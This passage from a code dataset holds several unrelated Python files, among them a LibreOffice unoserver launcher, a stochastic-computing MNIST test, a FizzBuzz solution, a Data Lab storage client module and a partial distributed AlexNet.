request\n\nlogging.basicConfig()\nlogger = logging.getLogger(\"unoserver\")\nlogger.setLevel(logging.INFO)\n\n\nclass UnoServer:\n def __init__(self, interface=\"127.0.0.1\", port=\"2002\"):\n self.interface = interface\n self.port = port\n\n def start(self, daemon=False, executable=\"libreoffice\"):\n logger.info(\"Starting unoserver.\")\n\n with tempfile.TemporaryDirectory() as tmpuserdir:\n\n connection = (\n \"socket,host=%s,port=%s,tcpNoDelay=1;urp;StarOffice.ComponentContext\"\n % (self.interface, self.port)\n )\n\n # Store this as an attribute, it helps testing\n self.tmp_uri = \"file://\" + request.pathname2url(tmpuserdir)\n\n # I think only --headless and --norestore are needed for\n # command line usage, but let's add everything to be safe.\n cmd = [\n executable,\n \"--headless\",\n \"--invisible\",\n \"--nocrashreport\",\n \"--nodefault\",\n \"--nologo\",\n \"--nofirststartwizard\",\n \"--norestore\",\n f\"-env:UserInstallation={self.tmp_uri}\",\n f\"--accept={connection}\",\n ]\n\n logger.info(\"Command: \" + \" \".join(cmd))\n process = subprocess.Popen(cmd)\n\n def sigterm_handler(signum, frame):\n logger.info(\"Exiting on termination signal\")\n process.terminate()\n return\n\n signal.signal(signal.SIGTERM, sigterm_handler)\n\n if not daemon:\n try:\n process.wait()\n except KeyboardInterrupt:\n logger.info(\"Exiting on termination signal\")\n process.terminate()\n return\n\n else:\n return process\n\n\ndef main():\n parser = argparse.ArgumentParser(\"unoserver\")\n parser.add_argument(\n \"--interface\", default=\"127.0.0.1\", help=\"The interface used by the server\"\n )\n parser.add_argument(\"--port\", default=\"2002\", help=\"The port used by the server\")\n parser.add_argument(\"--daemon\", action=\"store_true\", help=\"Deamonize the server\")\n parser.add_argument(\n \"--executable\",\n default=\"libreoffice\",\n help=\"The path to the LibreOffice executable\",\n )\n args = parser.parse_args()\n\n server = UnoServer(args.interface, args.port)\n # If it's daemonized, this returns the process.\n # It returns 0 of getting killed in a normal way.\n # Otherwise it returns 1 after the process exits.\n process = server.start(daemon=True, executable=args.executable)\n if args.daemon:\n return process\n pid = process.pid\n process.wait()\n try:\n # Make sure it's really dead\n os.kill(pid, 0)\n # It was killed\n return 0\n except OSError as e:\n if e.errno == 3:\n # All good, it was already dead.\n return 0\n raise\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"src/unoserver/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":3148,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"119791958","text":"from snn.bnLayer import BNModel\nfrom keras.layers import Conv2D, Activation, MaxPooling2D, Dense, Flatten\nfrom keras import regularizers\nfrom keras import backend as K\nfrom keras.callbacks import Callback\nimport keras\nfrom keras.datasets import mnist\nfrom keras.utils.generic_utils import get_custom_objects\nimport numpy as np\nimport snn.hoUtils as hoU\nimport snn.hoModel as hoM\nimport snn.hoLayer as hoL\nimport global_variables\nimport WeightScale\n\n\nglobal_variables.DefineGlobalVariables()\n\n\ndef first_layer_activation(x):\n return K.tanh(x)\n\n\ndef load_data():\n num_classes = 10\n # the data, shuffled and split between train and test sets\n (x_train, y_train), (x_test, y_test) = mnist.load_data()\n\n x_train = x_train.astype('float32')\n x_test = x_test.astype('float32')\n x_train 
/= 255\n x_test /= 255\n\n img_rows = x_train.shape[1]\n img_cols = x_train.shape[2]\n\n # convert class vectors to binary class matrices\n y_train = keras.utils.to_categorical(y_train, num_classes)\n y_test = keras.utils.to_categorical(y_test, num_classes)\n\n if K.image_data_format() == 'channels_first':\n x_train = x_train.reshape(x_train.shape[0], 1, img_rows, img_cols)\n x_test = x_test.reshape(x_test.shape[0], 1, img_rows, img_cols)\n else:\n x_train = x_train.reshape(x_train.shape[0], img_rows, img_cols, 1)\n x_test = x_test.reshape(x_test.shape[0], img_rows, img_cols, 1)\n return (x_train, y_train, x_test, y_test)\n\n\nget_custom_objects().update({'first_layer_activation': Activation(first_layer_activation)})\n(x_train, y_train, x_test, y_test) = load_data()\n\ninput_shape = x_train.shape[1:]\nprint(input_shape)\n\nglobal_variables.bnModel = BNModel(8)\nglobal_variables.bnModel.SetId(1)\nglobal_variables.bnModel[0] = Conv2D(3, kernel_size=(5, 5), input_shape=input_shape, use_bias=False, kernel_regularizer=regularizers.l1(0.001))\nglobal_variables.bnModel[1] = Activation('first_layer_activation')\nglobal_variables.bnModel[2] = MaxPooling2D(pool_size=(2, 2))\nglobal_variables.bnModel[3] = Flatten()\nglobal_variables.bnModel[4] = Dense(100)\nglobal_variables.bnModel[5] = Activation('relu')\nglobal_variables.bnModel[6] = Dense(10)\nglobal_variables.bnModel[7] = Activation('softmax')\nglobal_variables.bnModel.LoadLayers()\nglobal_variables.bnModel.Compile(loss=keras.losses.mse, optimizer=keras.optimizers.Adadelta(), metrics=['accuracy'])\nglobal_variables.bnModel.Fit(x_train, y_train, batch_size=128, epochs=1, verbose=1, callbacks=[WeightScale.WeightScale()], validation_data=(x_test, y_test))\n\nglobal_variables.bnModel.Load_weights('../results/#Epoch1_weights_of_1st_model_network_test.h5')\nglobal_variables.bnModel.Evaluate(x_test, y_test, verbose=1, indexModel=1)\nglobal_variables.bnModel.OptimizeNetwork('network_test', '../results/#Epoch1_weights_of_1st_model_network_test.h5',\n '../results/#Epoch1_weights_of_1st_model_network_test.h5',\n WeightScale,\n cntIter=1,\n tupleLayer=(1, ),\n x_train=x_train,\n y_train=y_train,\n x_test=x_test,\n y_test=y_test,\n epochs=1,\n batch_size=128)\n\nkBits = 10\nlength = 2**kBits\n\nut=hoU.HOUtils(kBits=kBits)\nmodel = global_variables.bnModel.GetModel()\nweight_1_SNs, bias_1_SNs, listIndex1 = ut.GetConvolutionLayerWeightsBiasesSN(model, 1, Adaptive=\"True\")\n\n#dense_1_weight_SNs= ut.GetConnectedLayerWeightsSN(model, 5)\n#dense_1_biases= ut.GetConnectedLayerBiases(model, 5)\ndense_1_weight_SNs, dense_1_biases_SNs, listIndexDense = ut.GetConnectedLayerWeightsBiasesSN(model, 5, Adaptive=\"True\")\n\ndense_2_weights= ut.GetConnectedLayerWeights(model, 7)\ndense_2_biases= ut.GetConnectedLayerBiases(model, 7)\n\n\ncorrect_predictions = 0\nSN_input_matrix = np.full((28, 28, length), False)\nfor i in range(10000):\n print(\"test image:\", i)\n x = x_test[i]\n for j in range(28):\n for k in range(28):\n SN_input_matrix[j, k] = ut.CreateSN(x[0, j, k])\n\n hoModel = hoM.HOModel(SN_input_matrix, kBits=kBits)\n hoModel.SetNumOutputPlanes(3)\n hoModel.SetWeights(weight_1_SNs)\n hoModel.SetZeroBias(3)\n hoModel.SetListIndex(listIndex1)\n hoConvLayer = hoL.HOConvolution(5, 5, kBits=kBits, use_bias=\"False\", baseMode=\"Mux\", activationFunc=\"STanh\")\n hoModel.Activation(hoConvLayer, stride=1)\n hoMaxLayer = hoL.HOMaxPoolingExact(2, 2, kBits=kBits)\n hoModel.Activation(hoMaxLayer, stride=2)\n hoModel.SetNumOutputPlanes(1)\n 
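# (added note) the first dense layer runs in the stochastic domain, so its\n    # weights and biases are attached as pre-generated stochastic numbers (SNs)\n    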
hoModel.SetDenseWeights(dense_1_weight_SNs)\n hoModel.SetDenseBias(dense_1_biases_SNs)\n hoModel.SetListIndexDense(listIndexDense)\n hoDenseLayer = hoL.HOConnected(kBits=kBits, use_bias=\"True\", stochToInt=\"APC\", activationFunc=\"Relu\")\n hoModel.Activation(hoDenseLayer, num_classes=100)\n output = hoModel.GetOutputMatrix()\n output = ut.BinaryConnectedLAyer(100, 10, output, dense_2_weights, dense_2_biases)\n\n if (np.argmax(output) == np.argmax(y_test[i])):\n correct_predictions = correct_predictions + 1\n\n print(\"accuracy:\", correct_predictions/(i+1))","sub_path":"test/network_test2.py","file_name":"network_test2.py","file_ext":"py","file_size_in_byte":5313,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"287985647","text":"from pygame.locals import *\nimport pygame\nimport math\nfrom time import sleep\n\nclass Ball(pygame.sprite.Sprite):\n #Starting position and speed\n speed = 6\n\n def __init__(self):\n super().__init__()\n self.image = pygame.Surface([250, 250])\n self.image = pygame.image.load(\"images/Ball.png\").convert_alpha()\n self.rect = self.image.get_rect(center=(10, 350))\n self.rect.bottom = 770\n self.rect.x = 269.5\n self.rect.y = 369.5\n","sub_path":"Examples/Ball.py","file_name":"Ball.py","file_ext":"py","file_size_in_byte":478,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"233548544","text":"\n\n\n\n\n\n\nimport numpy as np\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport torch.optim as optim\nimport torch.optim.lr_scheduler as lr_scheduler\nfrom torch.autograd import Variable\nfrom torch.utils.data.sampler import BatchSampler, SubsetRandomSampler\n\n\n\n\n\n\n\ndef discrim_predictions(model_dict, states, actions, discriminator, reverse=False):\n\n #rollouts has states, actions, dones of n-step\n #discriminator takes two frames, predicts an action\n #this func will use discrim to make preds and compute the error of those preds \n #then return the errors for each timestep\n #then those errors will be used to optimze the discrim and agent \n\n\n #How to deal with last timestep if doing 2-timestep pred? 
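(answered below: horizons\n    # that would run past the rollout are skipped, and the per-step average\n    # divides by the number of horizons that actually fit)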
\n #Maybe ill just combine with 1-step\n #Ya make the step number be changeable \n #note that this is different from the n-step for computing the return\n\n #will be averaging over n-step prediction errors\n\n n_steps = model_dict['num_steps'] #this is the episode length basically\n n_processes = model_dict['num_processes'] #this is the episode length basically\n\n max_pred_step = 3 #5\n #list for each n-step\n errors = [[] for i in range(max_pred_step)]\n\n\n\n # states = torch.cuda.FloatTensor(states) #.cuda() #[S+1,P,stack,84,84]\n # actions = torch.cuda.LongTensor(actions) #.cuda() #[S,P,1]\n\n # print (states.size())\n # print (actions.size())\n # faads\n\n if reverse:\n idx = [i for i in range(n_steps, -1, -1)]\n idx = torch.LongTensor(idx).cuda()\n states = states.index_select(0, idx)\n idx = [i for i in range(n_steps-1, -1, -1)]\n idx = torch.LongTensor(idx).cuda()\n actions = actions.index_select(0, idx)\n # else:\n # states = rollouts.states\n # actions = rollouts.actions\n\n # print (torch.sum(states[0]))\n # print (torch.sum(states[-1]))\n\n # print (states.size())\n\n for s in range(1,max_pred_step+1):\n\n for t in range(n_steps):\n\n # get states for this action and n-step\n #first state is state of action, final state is n-step away\n # print (rollouts.states[t].size()) #[P,stack,84,84]\n # print (rollouts.actions[t].size()) #[P,1]\n \n\n if t+s <= n_steps:\n\n # print (t, 't')\n\n #take last one in the stack, which is the newest frame\n first_frame = states[t][:,-1].contiguous().view(n_processes,1,84,84) #[P,1,84,84]\n # print (first_frame.size())\n final_frame = states[t+s][:,-1].contiguous().view(n_processes,1,84,84)\n\n action = Variable(actions[t])\n\n discrim_error = discriminator.forward(first_frame, final_frame, action)\n\n errors[s-1].append(discrim_error)\n\n # else:\n # fdsfas\n #insert zero if less than n-step states left\n #maybe not, it just wont be averaged over this step\n\n\n #LOOK at episode completion!!-\n # print ('len')\n # print (len(errors))\n # print (len(errors[0]))\n # print (len(errors[1]))\n \n\n #average the errors\n avg_errors = []\n for t in range(n_steps):\n\n # print (t, 't')\n\n count = 0\n for s in range(max_pred_step):\n\n # print (s, 's')\n\n\n if s == 0:\n errors_sum = errors[s][t]\n count = 1\n else:\n if t < len(errors[s]):\n errors_sum += errors[s][t]\n count+=1\n\n # print (count)\n avg_error = errors_sum / count\n avg_errors.append(avg_error)\n\n # print (len(avg_errors)) #[S,P]\n avg_errors = torch.stack(avg_errors)#[S,P]\n # print (avg_errors.size())#[S,P]\n # fdsfa\n\n #still missing that Im not looking at episode completion. 
..\n\n if reverse:\n idx = [i for i in range(n_steps-1, -1, -1)]\n idx = torch.LongTensor(idx).cuda()\n avg_errors = avg_errors.index_select(0, Variable(idx))\n\n return avg_errors\n\n\n \n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","sub_path":"RL4/rl_mar2018_7_deepq/discrim_preds.py","file_name":"discrim_preds.py","file_ext":"py","file_size_in_byte":4094,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"606529155","text":"class Solution(object):\n def fizzBuzz(self, n, ):\n \"\"\"\n\n :type n: int\n :rtype: List[str]\n \"\"\"\n ret = list()\n\n for i in range(1, n + 1):\n if not i % 3:\n if not i % 5:\n ret.append('FizzBuzz')\n else:\n ret.append('Fizz')\n elif not i % 5:\n ret.append('Buzz')\n else:\n ret.append(str(i))\n return ret\n\n\ndef main():\n solution = Solution()\n ret = solution.fizzBuzz()\n print(ret)\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"simple/412_fizz_buzz.py","file_name":"412_fizz_buzz.py","file_ext":"py","file_size_in_byte":601,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"212250477","text":"#!/usr/bin/env python\n#\n# STORECLIENT -- Client routines for the Data Lab Store Manager Service\n#\n\nfrom __future__ import print_function\n\n__authors__ = 'Matthew Graham , Mike Fitzpatrick , Data Lab '\n__version__ = '20170430' # yyyymmdd\n\n\n\"\"\"\n Client routines for the DataLab store manager service\n\nImport via\n\n.. code-block:: python\n\n from dl import storeClient\n\"\"\"\n\nimport os, sys\nimport fnmatch, glob\nimport requests\nfrom io import StringIO\t\t# Python 2/3 compatible\nimport json\n\n\n#####################################\n# Store manager client procedures\n#####################################\n\n\nDEF_SERVICE_URL = \"http://dlsvcs.datalab.noao.edu/storage\"\nPROFILE = \"default\"\nDEBUG = False\n\n\nclass storeClientError (Exception):\n def __init__(self, message):\n self.message = message\n\n\n# Pretty-printer for file sizes.\ndef sizeof_fmt(num):\n for unit in ['B','K','M','G','T','P','E','Z']:\n if abs(num) < 1024.0:\n if unit == 'B':\n return \"%5d%s\" % (num, unit)\n else:\n return \"%3.1f%s\" % (num, unit)\n num /= 1024.0\n return \"%.1f%s\" % (num, 'Y')\n\n\n\n# GET -- Retrieve a file from the store manager service\ndef get(token, fr, to, verbose=True):\n \"\"\"\n Retrieve a file from the store manager service\n \"\"\"\n debug = False\n headers = {'X-DL-AuthToken': token}\n\n # Patch the names with the URI prefix if needed.\n nm = (fr if fr.startswith(\"vos://\") else (\"vos://\" + fr))\n\n if debug:\n print (\"get: nm = %s\" % nm)\n if hasmeta(fr):\n if not os.path.isdir(to):\n raise storeClientError(\"Location must be specified as a directory\")\n if to == '':\n raise storeClientError(\n \"Multi-file requests require a download location\")\n\n if to != '':\n flist = expandFileList(token, nm, \"csv\", full=True)\n if debug: print (\"get: flist = %s\" % flist)\n nfiles = len(flist)\n fnum = 1\n resp = []\n for f in flist:\n junk, fn = os.path.split(f)\n if to.endswith(\"/\"):\n dlname = ((to + fn) if hasmeta(fr) else to)\n else:\n dlname = ((to + \"/\" + fn) if hasmeta(fr) else to)\n\n url = requests.get(DEF_SERVICE_URL + \"/get?name=%s\" % f,\n headers=headers)\n\n if url.status_code != 200:\n resp.append(\"Error: \" + url.text)\n else:\n r = requests.get(url.text, stream=True)\n clen = r.headers.get('content-length')\n total_length = (0 if clen is None else int(clen))\n\n dl = 0\n with open(dlname, 'wb', 0) as fd:\n 
for chunk in r.iter_content(chunk_size=1024):\n dl += len (chunk)\n if chunk:\n fd.write(chunk)\n if total_length > 0:\n done = int(20 * dl / total_length)\n\n if verbose:\n # Print a progress indicator\n sys.stdout.write (\"\\r(%d/%d) [%s%s] [%7s] %s\" % \\\n (fnum, nfiles, '=' * done, ' ' * (20-done),\n sizeof_fmt(dl), f[6:]))\n sys.stdout.flush()\n\n # Handle a zero-length file download.\n if verbose:\n if dl == 0:\n print (\"\\r(%d/%d) [%s] [%7s] %s\" % \\\n (fnum, nfiles, '=' * 20, \"0 B\", f[6:]))\n else:\n print('')\n fd.close()\n resp.append(r)\n fnum += 1\n\n return str(resp)\n\n else:\n url = requests.get(DEF_SERVICE_URL + \"/get?name=%s\" % nm,\n headers=headers)\n r = requests.get(url.text, stream=False, headers=headers)\n return r.content\n\n\n# PUT -- Upload a file to the store manager service\ndef put(token, fr, to, verbose=True):\n \"\"\"\n Upload a file to the store manager service\n \"\"\"\n debug = False\n headers = {'X-DL-AuthToken': token}\n\n # If the 'to' is a directory, create it first and then transfer the\n # contents.\n if os.path.isdir (fr):\n if fr.endswith(\"/\"):\n dname = (to if to.startswith(\"vos://\") else to[:-1])\n mkdir (token, dname)\n flist = glob.glob(fr+\"/*\")\n else:\n dname = ''\n flist = [fr]\n\n if debug:\n print (\"fr=%s to=%s dname=%s\" % (fr, to, dname))\n print (flist)\n\n nfiles = len(flist)\n fnum = 1\n resp = []\n for f in flist:\n\n fr_dir, fr_name = os.path.split(f)\n\n # Patch the names with the URI prefix if needed.\n nm = (to if to.startswith(\"vos://\") else (\"vos://\" + to))\n if to.endswith(\"/\"):\n nm = nm + fr_name\n\n if debug:\n print (\"put: f=%s nm=%s\" % (f,nm))\n\n if not os.path.exists(f):\n # Skip files that don't exist\n print (\"Error: file '%s' does not exist\" % f)\n continue\n\n r = requests.get(DEF_SERVICE_URL + \"/put?name=%s\" % nm, headers=headers)\n\n # Cannot upload directly to a container\n # if r.status_code == 500 and r.content == \"Data cannot be uploaded to a\n # container\":\n if r.status_code == 500:\n file = fr[fr.rfind('/') + 1:]\n nm += '/%s' % f\n r = requests.get(DEF_SERVICE_URL + \"/put?name=%s\" % nm, \n headers=headers)\n file = open(f).read()\n\n try:\n if verbose:\n sys.stdout.write (\"(%d / %d) %s -> \" % (fnum, nfiles, f))\n\n # FIXME -- Will this work for really large files?\n requests.put(r.content, data=file,\n headers={'Content-type': 'application/octet-stream',\n 'X-DL-AuthToken': token})\n if verbose:\n print (\"%s\" % nm)\n\n except Exception as e:\n #raise storeClientError(e.message)\n resp.append (e.message)\n else:\n resp.append (\"OK\")\n\n fnum += 1\n\n\n# CP -- Copy a file/directory within the store manager service\ndef cp(token, fr, to, verbose=False):\n \"\"\"\n Copy a file/directory within the store manager service\n \"\"\"\n # Patch the names with the URI prefix if needed.\n src = (fr if fr.startswith(\"vos://\") else (\"vos://\" + fr))\n dest = (to if to.startswith(\"vos://\") else (\"vos://\" + to))\n\n # If the 'from' string has no metacharacters we're copying a single file,\n # otherwise expand the file list and process the matches individually.\n if not hasmeta(fr):\n r = getFromURL(\"/cp?from=%s&to=%s\" % (src, dest), token)\n return r\n else:\n flist = expandFileList(token, src, \"csv\", full=True)\n nfiles = len(flist)\n fnum = 1\n resp = []\n for f in flist:\n junk, fn = os.path.split (f)\n to_fname = dest + ('/%s' % fn)\n if verbose:\n print (\"(%d / %d) %s -> %s\" % (fnum, nfiles, f, to_fname))\n r = getFromURL(\"/cp?from=%s&to=%s\" % (f, to_fname), token)\n 
fnum += 1\n            resp.append(r)\n        return resp\n\n\n# LN -- Create a link to a file/directory in the store manager service\ndef ln(token, fr, target):\n    \"\"\"\n    Create a link to a file/directory in the store manager service\n    \"\"\"\n    try:\n        r = getFromURL(\"/ln?from=%s&to=%s\" % (fr, target), token)\n    except Exception as e:\n        raise storeClientError(str(e))\n    else:\n        return \"OK\"\n\n\n# LS -- Get a file/directory listing from the store manager service\ndef ls(token, name, format='csv'):\n    \"\"\"\n    Get a file/directory listing from the store manager service\n\n    Parameters\n    ----------\n    token : str\n        Secure token obtained via :func:`dl.auth.login`\n\n    name : str\n        Valid name of file or directory, e.g. ``vos://somedir``\n\n        .. todo:: [20161110] currently doesn't seem to work.\n\n    format : str\n        Default ``csv``.\n\n    Example\n    -------\n\n    .. code-block:: python\n\n        listing = dl.storeClient.ls(token,name='vos://somedir')\n        print(listing)\n\n    This prints for instance:\n\n    .. code::\n\n        bar2.fits,foo1.csv,fancyfile.dat\n\n    \"\"\"\n    flist = expandFileList(token, name, format, full=False)\n    if (format == 'csv'):\n        result = \",\".join(flist)\n        return (result[1:] if result.startswith(\",\") else result)\n\n    else:\n        results = []\n        for f in flist:\n            url = DEF_SERVICE_URL + \"/ls?name=vos://%s&format=%s\" % (f, format)\n            r = requests.get(url, headers={'X-DL-AuthToken': token})\n            results.append(r.content)\n\n        return \"\\n\".join(results)\n\n\n# MKDIR -- Create a directory in the store manager service\ndef mkdir(token, name):\n    \"\"\" \n    Create a directory in the storage manager service\n    \"\"\"\n    try:\n        r = getFromURL(\"/mkdir?dir=%s\" % name, token)\n    except Exception as e:\n        raise storeClientError(str(e))\n    else:\n        return \"OK\"\n\n\n# MV -- Move/rename files/directories within the store manager service\ndef mv(token, fr, to, verbose=False):\n    \"\"\"\n    Move/rename files/directories within the store manager service\n    \"\"\"\n\n    # Patch the names with the URI prefix if needed.\n    src = (fr if fr.startswith(\"vos://\") else (\"vos://\" + fr))\n    dest = (to if to.startswith(\"vos://\") else (\"vos://\" + to))\n\n    # If the 'from' string has no metacharacters we're moving a single file,\n    # otherwise expand the file list and process the matches\n    # individually.\n    if not hasmeta(fr):\n        r = getFromURL(\"/mv?from=%s&to=%s\" % (src, dest), token)\n        return r\n    else:\n        flist = expandFileList(token, src, \"csv\", full=True)\n        nfiles = len(flist)\n        fnum = 1\n        resp = []\n        for f in flist:\n            junk, fn = os.path.split (f)\n            to_fname = dest + ('/%s' % fn)\n            if verbose:\n                print (\"(%d / %d) %s -> %s\" % (fnum, nfiles, f, to_fname))\n            r = getFromURL(\"/mv?from=%s&to=%s\" % (f, to_fname), token)\n            fnum += 1\n            resp.append(r)\n        return resp\n\n\n# RM -- Delete one or more files from the store manager service.\ndef rm(token, name, verbose=False):\n    \"\"\"\n    Delete one or more files from the store manager service.\n    \"\"\"\n\n    # Patch the names with the URI prefix if needed.\n    nm = (name if name.startswith(\"vos://\") else (\"vos://\" + name))\n\n    # If the 'name' string has no metacharacters we're deleting a single file,\n    # otherwise expand the file list and process the matches\n    # individually.\n    if not hasmeta(nm):\n        r = getFromURL(\"/rm?file=%s\" % nm, token)\n        return r\n    else:\n        flist = expandFileList(token, nm, \"csv\", full=True)\n        nfiles = len(flist)\n        fnum = 1\n        resp = []\n        for f in flist:\n            if verbose:\n                print (\"(%d / %d) %s\" % (fnum, nfiles, f))\n            r = getFromURL(\"/rm?file=%s\" % f, token)\n            fnum += 1\n
            resp.append(r)\n        return resp\n\n\n# RMDIR -- Delete a directory from the store manager service\ndef rmdir(token, name):\n    \"\"\"\n    Delete a directory from the store manager service\n    \"\"\"\n    try:\n        saveAs (token, \"deleted\", name+\"/.deleted\")\n        r = getFromURL(\"/rmdir?dir=%s\" % name, token)\n    except Exception as e:\n        raise storeClientError(str(e))\n    else:\n        return \"OK\"\n\n\n# SAVEAS -- Save the string representation of a data object as a file.\ndef saveAs(token, data, name):\n    \"\"\"\n    Save the string representation of a data object as a file.\n    \"\"\"\n\n    import tempfile\n\n    try:\n        with tempfile.NamedTemporaryFile(delete=False) as tfd:\n            tfd.write(str(data))\n            tfd.flush()\n            tfd.close()\n    except Exception as e:\n        raise storeClientError(str(e))\n\n    # Patch the names with the URI prefix if needed.\n    nm = (name if name.startswith(\"vos://\") else (\"vos://\" + name))\n\n    # Put the temp file to the VOSpace.\n    put(token, fr=tfd.name, to=nm, verbose=False)\n\n    os.unlink(tfd.name)  # Clean up\n\n    return \"OK\"\n\n\n# TAG -- Annotate a file/directory in the store manager service\ndef tag(token, name, tag):\n    \"\"\"\n    Annotate a file/directory in the store manager service\n    \"\"\"\n    try:\n        r = getFromURL(\"/tag?file=%s&tag=%s\" % (name, tag), token)\n    except Exception as e:\n        raise storeClientError(str(e))\n    else:\n        return \"OK\"\n\n\n# -------------------------------------------------------\n#  Utility Methods\n# -------------------------------------------------------\n\ndef hasmeta(s):\n    \"\"\" Determine whether a string contains filename meta-characters.\n    \"\"\"\n    return (s.find('*') >= 0) or (s.find('[') >= 0) or (s.find('?') >= 0)\n\n\ndef expandFileList(token, pattern, format, full=False):\n    \"\"\" Expand a filename pattern in a VOSpace URI to a list of files.  We\n        do this by getting a listing of the parent container contents from\n        the service and then match the pattern on the client side.\n    \"\"\"\n    debug = False\n\n    # The URI prefix is constant whether it's included in the pattern string\n    # or not.  The storage manager (SM) controls a specific instance of VOSpace so at the\n    # moment the expansion to the VOSpace URI is handled on the server. 
We'll\n # prepend this to the service call as needed to ensure a correct argument\n # and give the calling routine the option of leaving it off.\n uri = 'vos://'\n str = (pattern[6:] if pattern.startswith('vos://') else pattern)\n\n # Extract the directory and filename/pattern from the string.\n dir, name = os.path.split(str)\n if debug:\n print (\"-----------------------------------------\")\n print (\"PATTERN = '\" + str + \"'\")\n print ('str = ' + str)\n print (\"split: '%s' '%s'\" % (dir, name))\n\n pstr = (name if (name is not None and hasmeta(name)) else \"*\")\n\n if dir is not None:\n if dir == \"/\" and name is not None:\n dir = dir + name\n else:\n if dir.endswith(\"/\"):\n dir = dir[:-1] # trim trailing '/'\n if not dir.startswith(\"/\"):\n dir = \"/\" + dir # prepend '/'\n else:\n dir = '/'\n if name is not None:\n dir = dir + name\n if dir == \"/\":\n dir = \"\"\n pstr = name\n if not hasmeta(name) and name is not None:\n pstr = (name if name != '' else \"*\")\n\n # Make the service call to get a listing of the parent directory.\n url = DEF_SERVICE_URL + \"/ls?name=vos://%s&format=%s\" % (dir, \"csv\")\n r = requests.get(url, headers={'X-DL-AuthToken': token})\n\n # Filter the directory contents list using the filename pattern.\n list = []\n flist = r.content.split(',')\n for f in flist:\n if fnmatch.fnmatch(f, pstr) or f == pstr:\n furi = (f if not full else (uri + dir + \"/\" + f))\n list.append(furi.replace(\"///\", \"//\"))\n\n if debug:\n print (url)\n print (\"%s --> '%s' '%s' '%s' => '%s'\" % (pattern, uri, dir, name, pstr))\n\n return sorted(list)\n\n\n# Get from a URL\ndef getFromURL(path, token):\n try:\n resp = requests.get(\"%s%s\" % (DEF_SERVICE_URL, path),\n headers={\"X-DL-AuthToken\": token})\n except Exception as e:\n raise storeClientError(e.message)\n return resp\n\n\n# SERVICE_URL -- Set the service url to use\n#\ndef set_svc_url(svc_url):\n \"\"\"Set the storage manager service URL.\n\n Parameters\n ----------\n svc_url : str\n The service URL of the storage manager to use \n\n Returns\n -------\n\n Example\n -------\n\n .. code-block:: python\n\n # set the service url\n\n url = \"http://dldemo.sdm.noao.edu:7003\"\n storeClient.set_scv_url(url)\n\n \"\"\"\n global DEF_SERVICE_URL\n DEF_SERVICE_URL = svc_url\n\n\n# PROFILES -- Get the profiles supported by the storage manager service\n#\ndef list_profiles(token, profile=None):\n \"\"\"Retrieve the profiles supported by the storage manager service\n\n Parameters\n ----------\n token : str\n Authentication token (see function :func:`dl.auth.login()`)\n\n profile : str\n A specific profile to list\n\n Returns\n -------\n profiles : list/dict\n A list of the names of the supported profiles or a dictionary of the\n specific profile\n\n Example\n -------\n\n .. code-block:: python\n\n # get the list of profiles\n profiles = storeClient.list_profiles(token)\n \"\"\"\n\n #headers = {'Content-Type': 'text/ascii',\n # 'X-DL-AuthToken': token} # application/x-sql\n dburl = 'profiles'\n if profile != None:\n dburl += \"/%s\" % profile\n r = getFromURL(dburl, token)\n profiles = r.content\n if '{' in profiles:\n profiles = json.load(StringIO(profiles))\n return profiles\n\n\n# PROFILES -- Set the profile to be used\n#\ndef set_profile(profile):\n \"\"\"Set the profile\n\n Parameters\n ----------\n profile : str\n The name of the profile to use. The list of available ones can be retrieved from the service (see function :func:`storeClient.list_profiles()`)\n\n Returns\n -------\n\n Example\n -------\n\n .. 
code-block:: python\n\n # set the profile\n storeClient.set_profile(\"default\")\n \"\"\"\n\n global PROFILE\n PROFILE = profile\n\n\n# PROFILES -- Set the profile to be used\n#\ndef get_profile(profile):\n \"\"\"Get the profile\n\n Parameters\n ----------\n\n Returns\n -------\n profile : str\n The name of the current profile used with the storage manager service\n\n\n Example\n -------\n\n .. code-block:: python\n\n # get the profile\n storeClient.get_profile()\n \"\"\"\n\n return PROFILE\n","sub_path":"build/lib/dl/storeClient.py","file_name":"storeClient.py","file_ext":"py","file_size_in_byte":17963,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"320956681","text":"import chainer\nimport chainer.functions as F\nimport chainermnx.functions as FX\nimport chainer.links as L\nimport chainermnx.links as LX\nimport chainermnx\nimport cupy as cp\n\n\nclass AlexNet(chainer.Chain):\n\n def __init__(self, comm):\n super(AlexNet, self).__init__()\n self.comm = comm\n self.n_proc = self.comm.size\n with self.init_scope():\n self.conv1 = LX.Convolution2D(self.comm, 1, None, 96, 11, stride=4)\n self.conv2 = LX.Convolution2D(self.comm, 2, None, 256, 3, pad=(0, 1))\n self.conv3 = LX.Convolution2D(self.comm, 3, None, 384, 3, pad=(0, 1))\n self.conv4 = LX.Convolution2D(self.comm, 4, None, 384, 3, pad=(0, 1))\n self.conv5 = L.Convolution2D(None, 256, 3, pad=1)\n self.fc6 = L.Linear(None, 4096)\n self.fc7 = L.Linear(None, 4096)\n self.fc8 = L.Linear(None, 1000)\n\n def forward(self, x):\n partions = cp.array_split(x, self.comm.size, -2)\n # This part needs fixing. Probably all conditions are not checked\n if self.comm.rank == 0:\n x = partions[0]\n elif self.comm.rank == 1:\n x = partions[1]\n elif self.comm.rank == 2:\n x = partions[2]\n elif self.comm.rank == 3:\n x = partions[3]\n else:\n print(\"Rank does not exist\")\n\n h = FX.halo_exchange(self.comm, x, k_size=5, index=1, pad=0)\n h = F.relu(self.conv1(h))\n\n h = FX.pooling_halo_exchange(self.comm, h, k_size=3, index=11)\n h = F.max_pooling_2d(h, ksize=3, stride=2)\n\n h = FX.halo_exchange(self.comm, h, k_size=3, index=2, pad=1)\n h = F.relu(self.conv2(h))\n\n h = FX.pooling_halo_exchange(self.comm, h, k_size=3, index=22)\n h = F.max_pooling_2d(h, ksize=3, stride=2)\n\n h = FX.halo_exchange(self.comm, h, k_size=3, index=3, 